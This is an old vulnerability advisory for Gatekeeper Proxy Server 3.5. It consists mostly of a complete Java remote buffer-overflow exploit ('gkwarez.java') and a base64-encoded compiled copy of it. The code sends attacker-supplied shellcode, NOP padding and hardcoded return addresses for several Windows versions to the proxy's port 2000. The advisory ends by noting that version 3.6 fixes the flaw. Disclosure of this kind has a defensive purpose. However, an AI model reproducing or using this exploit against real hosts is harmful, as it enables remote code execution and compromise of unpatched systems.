|
Vulnerability GateKeeper Affected MDMA Crew's GateKeeper Description wizdumb found following. He covered a flaw in Gatekeeper 3.5. Below You will find the Java src and the bytecode attached. /* gkwarez.java by Andrew Lewis aka. Wizdumb * <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC> * * Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?). * Written as proof of concept code only - the MDMA crew do not condone * illegal activities in any way what-so-ever. * * This code is now public - Gatekeeper version 3.6 is out. :-) * * Shellcode is handled plug and play style for flexibility and defence * against script kiddies. :) Oh, and coz I'm too dumb to make some and too * lazy to find some. :P Also note that nulls in your shellcode are fine for * this daemon - just beware of terminating newlines. * * Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack */ import java.io.*; import java.net.*; class gkwarez { public static void main(String[] args) throws IOException { if (args.length != 3) { System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n"); System.out.println("Shellcode file is code you want to execute on the host"); System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)"); System.exit(1); } int c; Socket soq = null; char[] wet = null; PrintWriter white = null; BufferedReader hellkode = null; char nop = 0x90; char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 }; // Static addys for "call eax" (backwards) - any1 know of more? mail me. :) char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F }; char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF }; char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 }; char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 }; try { switch (Integer.parseInt(args[2])) { case 95: wet = retwin95; break; case 98: wet = retwin98; break; case 3: wet = retntsp3; break; case 4: wet = retntsp4; break; default: System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4"); System.exit(1); break; } } catch (Exception e) { System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4"); System.exit(1); } try { hellkode = new BufferedReader(new FileReader(args[1])); } catch (Exception e) { System.out.println("Unable to open file: " + args[1]); System.exit(1); } try { soq = new Socket(args[0], 2000); white = new PrintWriter(soq.getOutputStream(), true); } catch (Exception e) { System.out.println("Problems connecting :-/"); System.exit(1); } for (int i = 0; i <= 4800; i++) { if ((c = hellkode.read()) != -1) { white.write(c); if (i == 4096) { System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out..."); System.exit(1); } } else { if (i == 4096) { white.print(jmpcode); white.print(wet); } else white.print(nop); } } white.println(); System.out.println("Payload sent!"); } } And, here's the gkwarez.class: --- Content-Type: application/octet-stream; name="gkwarez.class" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="gkwarez.class" Content-MD5: qpjsTW7tRE944zc1xMirRA== yv66vgADAC0AbggATAgATQgATggATwgAUQgAUggAUwgAVAgAVQcAWQcAWwcAXAcAXQcAXgcA XwcAYAcAYQcAYgcAYwcAZAcAZQoAEgAoCgAPACkKAAsAKgoADAArCgATACsKABUALAoAEwAt CgAUAC4KABUALwkAFAAwCgARADEKAA8AMgoADwAzCgAPADQKAA4ANQoACwA2CgATADcKAA8A OAwARwA8DABHAD8MAEcAQAwARwBDDABHAEQMAFYAQgwAVwA+DABYADoMAGcASwwAaABBDABp AD0MAGkARQwAagA8DABqAEMMAGsAOQwAbAA7DABtAD4BAAMoKUkBABgoKUxqYXZhL2lvL091 dHB1dFN0cmVhbTsBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAygpVgEABChDKVYBAAQoSSlW AQAaKExqYXZhL2lvL091dHB1dFN0cmVhbTtaKVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAV KExqYXZhL2xhbmcvU3RyaW5nOylJAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5n L1N0cmluZ0J1ZmZlcjsBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABYoTGphdmEvbGFuZy9T dHJpbmc7SSlWAQAFKFtDKVYBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAGPGluaXQ+AQAE Q29kZQEACkV4Y2VwdGlvbnMBAA9MaW5lTnVtYmVyVGFibGUBABVMamF2YS9pby9QcmludFN0 cmVhbTsBAA1QYXlsb2FkIHNlbnQhAQAXUHJvYmxlbXMgY29ubmVjdGluZyA6LS8BADZTaGVs bGNvZGUgZmlsZSBpcyBjb2RlIHlvdSB3YW50IHRvIGV4ZWN1dGUgb24gdGhlIGhvc3QBAD9T aGVsbGNvZGUgc3BlY2lmaWVkIGlzIHRvbyBiaWcgKDQwOTUgYnl0ZXMgbWF4KS4gQmFpbGlu ZyBvdXQuLi4BAApTb3VyY2VGaWxlAQA3U3ludGF4OiBqYXZhIGdrd2FyZXogW2hvc3RdIFtz aGVsbGNvZGUtZmlsZV0gW3ZlcnNpb25dCgEAFVVuYWJsZSB0byBvcGVuIGZpbGU6IAEARlZh bGlkIHZlcnNpb25zIGFyZSA5NSAoV2luOTUpLCA5OCAoV2luOTgpLCAzIChOVDQvU1AzKSBh bmQgNCAoTlQ0L1NQNCkBADRWZXJzaW9uIHNwZWNpZmllZCBpbnZhbGlkOiBFeHBlY3Rpbmcg OTUsIDk4LCAzLCBvciA0AQAFXWPDt3cBAAZhcHBlbmQBAARleGl0AQAPZ2V0T3V0cHV0U3Ry ZWFtAQAHZ2t3YXJlegEADGdrd2FyZXouamF2YQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIB ABJqYXZhL2lvL0ZpbGVSZWFkZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YS9pby9Q cmludFN0cmVhbQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2xhbmcvRXhjZXB0aW9u AQARamF2YS9sYW5nL0ludGVnZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAWamF2YS9sYW5nL1N0 cmluZ0J1ZmZlcgEAEGphdmEvbGFuZy9TeXN0ZW0BAA9qYXZhL25ldC9Tb2NrZXQBAARtYWlu AQADb3V0AQAIcGFyc2VJbnQBAAVwcmludAEAB3ByaW50bG4BAARyZWFkAQAIdG9TdHJpbmcB AAV3cml0ZQAgAAoAEgAAAAAAAgAAAEcAPAABAEgAAAAdAAEAAQAAAAUqtwAWsQAAAAEASgAA AAYAAQAAABcACQBmAEYAAgBIAAADAQAGAA4AAAHlKr4GnwAfsgAfEgW2ACSyAB8SA7YAJLIA HxIHtgAkBLgAHQFNAU4BOgQBOgURAJA2Bge8BVkDEQDpVVkEEQD5VVkFEQDvVVkGEQCQVToH B7wFWQMQMFVZBBARVVkFEHFVWQYQf1U6CAe8BVkDEHtVWQQRAP9VWQURAPdVWQYRAL9VOgkH vAVZAxEAx1VZBBBaVVkFEQD6VVkGEHdVOgoHvAVZAxBdVVkEEGNVWQURAPdVWQYQd1U6CxIJ OgwqBTK4ACCrAAAAAEIAAAAEAAAAAwAAADYAAAAEAAAAPAAAAF8AAAAqAAAAYgAAADAZCE6n ADEZCU6nACsZCk6nACUZC06nAB+yAB8SCLYAJAS4AB2nABBXsgAfEgi2ACQEuAAduwALWbsA DFkqBDK3ABm3ABg6BacAIFeyAB+7ABNZEga3ABoqBDK2ABy2ACa2ACQEuAAduwAVWSoDMhEH 0LcAG027AA9ZLLYAHgS3ABc6BKcAEFeyAB8SArYAJAS4AB0DNg2nAE0ZBbYAJVk8Ap8AIBkE G7YAJxUNERAAoAAxsgAfEgS2ACQEuAAdpwAiFQ0REACgABMZBBkHtgAiGQQttgAipwAKGQQV BrYAIYQNARUNERLApP+xGQS2ACOyAB8SAbYAJLEAAwC8ARMBEwAQASABMwE2ABABUwFvAXIA EAABAEoAAADyADwAAAAbAAYAHAAOAB0AFgAeAB4AHwAiACIAJAAjACYAJAApACUALAAnADEA KABOACsAZwAsAIMALQCeAC4AuAAvALwAMQC8ADIA7AA0AO8ANQDyADcA9QA4APgAOgD7ADsA /gA9AQEAPgEEAEABDABBARAAQgEUAEMBHABEASAARgEgAEcBMwBGATYASAE3AEkBTwBKAVMA TAFTAE0BYQBOAW8ATAFyAE8BcwBQAXsAUQF/AFMBhQBUAZAAVQGWAFYBngBXAaYAWAGqAFQB rQBaAbUAWwG8AFwBwgBaAcUAXQHMAFMB1wBeAdwAXwHkABkASQAAAAQAAQANAAEAUAAAAAIA Wg== ----- Solution Gatekeeper 3.6 is out now it fixed bug above.